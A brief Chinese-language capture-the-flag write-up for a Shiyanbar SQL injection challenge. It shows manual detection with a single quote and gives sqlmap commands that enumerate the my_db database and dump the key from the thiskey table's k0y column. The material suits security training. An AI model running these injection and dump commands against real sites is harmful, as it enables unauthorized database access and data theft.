这个看起来有点简单!--实验吧

这个看起来有点简单!

手工检测是否存在sql注入（经典id=1'加入单引号提交,结果:如果出现错误提示，则该网站可能就存在注入漏洞） 使用sqlmap爆出当前数据库my_db 发现可能藏有key值的thiskey表 进一步爆出字段k0y并得到key值。 查看手册sql map python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns --hex